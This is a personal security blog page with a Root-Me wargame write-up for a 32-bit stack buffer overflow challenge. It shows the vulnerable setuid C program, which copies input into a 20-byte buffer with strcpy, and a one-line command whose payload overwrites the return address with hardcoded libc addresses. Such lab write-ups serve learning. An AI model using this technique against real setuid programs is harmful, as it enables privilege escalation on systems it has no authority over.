GiongfNef
  • ๐Ÿ“งReadme
  • ๐Ÿ’ฐBug Bounty
    • Business Logic: Bypass 2FA to ATO
    • 1 Click Account Take Over
  • ๐Ÿฅ‘CVE
    • CVE-2024-40492: Stored XSS to ATO
    • CVE-2023-5311
  • โ˜•Writeup CTF
    • Crypto
      • dvCTF 2022
      • Crew CTF 2022
      • รฅngstromCTF 2022
      • picoCTF 2022 + wscCTF 2022
      • Securinets CTF Quals 2022
      • NsuCrypto
      • KMA chall 2022
      • SEETF 2022
      • just CTF 2022
      • zer0pts CTF 2022
    • Web
      • ASCIS 2022 - warm up
      • RISEC CTF + UMass CTF 2022
      • LIT 2022
      • UIUCTF 2022
      • nullcon CTF2022
      • ๐ŸŽƒHack The Boo 2022
    • Writeup Intigriti challenge-0923
  • ๐Ÿ„Linh tinh kรฝ sแปฑ
    • ๐Ÿ“šBooks
    • note linh tinh
      • ๐ŸžBug logic Shopee: Giแบฃm 5-10% khi mua sแบฃn phแบฉm ?
      • ๐Ÿ’ŽFinancial Aid Application for Coursera
  • ๐Ÿซ–Wargame && Others
    • ๐Ÿ€OverTheWire: Bandit
      • ๐ŸŒฑOverTheWire: Bandit 2022 (new)
      • ๐ŸƒOverTheWire: (old) - Bandit
      • Writeup EVABSv5.apk (12levels)
    • ๐Ÿ“ฒAndroid
      • ๐Ÿ“ฒWriteup EVABSv5.apk (Solution 12 levels)
      • ๐ŸŽฎWriteup droids PicoCTF - (Solution 5 levels)
    • ๐ŸŒตRootme
      • ๐Ÿ๏ธWeb - Server
      • ๐Ÿ“ŸApp - System
        • ๐ŸŽฐELF x86 - Format string bug basic 1
        • ๐ŸฐELF x86 - Stack buffer overflow basic 1
        • ๐ŸฆŠELF x86 - Stack buffer overflow basic 2
        • ๐ŸปELF x86 - Stack buffer overflow basic 3
        • ๐ŸผELF x86 - Stack buffer overflow basic 4
        • ๐ŸงELF x86 - Stack buffer overflow basic 6
    • ๐Ÿ†Pentest
    • ๐Ÿ–‡๏ธBlockchain
Powered by GitBook
On this page
Edit on GitHub
  1. Wargame && Others
  2. Rootme
  3. App - System

ELF x86 - Stack buffer overflow basic 6

Note : A JOURNEY TO GAIN KNOWLEDGE

Code chall:

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
 
int main (int argc, char ** argv){
    char message[20];
 
    if (argc != 2){
        printf ("Usage: %s <message>\n", argv[0]);
        return -1;
    }
 
    setreuid(geteuid(), geteuid());
    strcpy (message, argv[1]);
    printf ("Your message: %s\n", message);
    return 0;
}
./ch33 `python -c "print 'A'*20 + '1'*12 + '\x10\x83\xe6\xb7' + 'AAAA' + '\x4c\xad\xf8\xb7'"`

PreviousELF x86 - Stack buffer overflow basic 4

Last updated 2 years ago

๐Ÿซ–
๐ŸŒต
๐Ÿ“Ÿ
๐Ÿง